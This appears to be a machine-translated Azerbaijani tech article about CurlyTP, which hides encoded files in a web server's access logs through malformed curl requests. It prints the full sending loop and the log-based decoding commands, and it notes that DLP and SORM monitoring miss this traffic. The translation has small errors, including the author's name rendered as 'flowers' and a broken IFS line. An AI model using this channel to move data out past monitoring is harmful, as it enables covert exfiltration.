Vikipediya tərifinə görə, ölü damla gizli bir yerdən istifadə edən insanlar arasında məlumat və ya bəzi əşyalar mübadiləsinə xidmət edən bir sui-qəsd vasitəsidir. İdeya budur ki, insanlar heç vaxt görüşmürlər - lakin əməliyyat təhlükəsizliyini qorumaq üçün yenə də məlumat mübadiləsi aparırlar.

Gizlənən yer diqqəti cəlb etməməlidir. Buna görə də, oflayn dünyada onlar tez-tez təmkinli şeylərdən istifadə edirlər: divarda boş bir kərpic, kitabxana kitabı və ya ağacdakı boşluq.

İnternetdə bir çox şifrələmə və anonimləşdirmə vasitələri var, lakin bu vasitələrdən istifadə faktının özü diqqəti cəlb edir. Bundan əlavə, onlar korporativ və ya hökumət səviyyəsində bloklana bilər. Nə etməli?

Tərtibatçı Ryan Flowers maraqlı bir seçim təklif etdi - hər hansı bir veb serverdən gizlənmə yeri kimi istifadə edin. Bu barədə düşünsəniz, veb server nə edir? Sorğuları qəbul edir, faylları verir və jurnallar yazır. Və bütün sorğuları qeyd edir, hətta səhv olanlar da!

Məlum olub ki, istənilən veb server demək olar ki, istənilən mesajı jurnalda saxlamağa imkan verir. Çiçəklər bundan necə istifadə edəcəyini düşündülər.

O, bu seçimi təklif edir:

1. Mətn faylı (gizli mesaj) götürün və hash (md5sum) hesablayın.
2. Biz onu kodlayırıq (gzip+uuencode).
3. Serverə bilərəkdən səhv sorğudan istifadə edərək jurnala yazırıq.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Faylı oxumaq üçün bu əməliyyatları tərs qaydada yerinə yetirməlisiniz: faylı deşifrə edin və açın, hashı yoxlayın (heş açıq kanallar vasitəsilə təhlükəsiz şəkildə ötürülə bilər).

Boşluqlar ilə əvəz olunur =+=ünvanda boşluq olmaması üçün. Müəllifin CurlyTP adlandırdığı proqram e-poçt əlavələri kimi base64 kodlaşdırmasından istifadə edir. Sorğu açar sözlə edilir ?transfer?ki, alıcı onu jurnallarda asanlıqla tapa bilsin.

Bu halda loglarda nə görürük?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Artıq qeyd edildiyi kimi, gizli mesaj almaq üçün əməliyyatları tərs qaydada yerinə yetirməlisiniz:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Prosesi avtomatlaşdırmaq asandır. Md5sum uyğun gəlir və faylın məzmunu hər şeyin düzgün deşifr edildiyini təsdiqləyir.

Metod çox sadədir. “Bu məşqin məqsədi faylların günahsız kiçik veb sorğuları vasitəsilə ötürülə biləcəyini sübut etməkdir və o, düz mətn qeydləri olan istənilən veb serverdə işləyir. Əslində, hər bir veb-server gizlənmə yeridir!”, – Çiçəklər yazır.

Əlbəttə ki, üsul yalnız alıcının server qeydlərinə girişi olduqda işləyir. Ancaq bu cür giriş, məsələn, bir çox hoster tərəfindən təmin edilir.

Necə istifadə etməli?

Ryan Flowers deyir ki, o, informasiya təhlükəsizliyi üzrə mütəxəssis deyil və CurlyTP üçün mümkün istifadələrin siyahısını tərtib etməyəcək. Onun üçün bu, sadəcə olaraq hər gün gördüyümüz tanış alətlərin qeyri-ənənəvi şəkildə istifadə oluna biləcəyi konsepsiyasının sübutudur.

Əslində, bu üsul digər server "gizlədir" kimi bir sıra üstünlüklərə malikdir Digital Dead Drop və ya PirateBox: server tərəfində xüsusi konfiqurasiya və ya hər hansı xüsusi protokol tələb etmir - və trafikə nəzarət edənlər arasında şübhə yaratmayacaq. SORM və ya DLP sisteminin sıxılmış mətn faylları üçün URL-ləri skan etməsi ehtimalı azdır.

Bu, xidmət faylları vasitəsilə mesajların ötürülməsi yollarından biridir. Bəzi qabaqcıl şirkətlərin necə yerləşdirdiklərini xatırlaya bilərsiniz HTTP Başlıqlarında Tərtibatçı İşləri və ya HTML səhifələrinin kodunda.

İdeya ondan ibarət idi ki, bu Pasxa yumurtasını yalnız veb tərtibatçıları görəcək, çünki normal bir insan başlıqlara və ya HTML koduna baxmazdı.

Mənbə: www.habr.com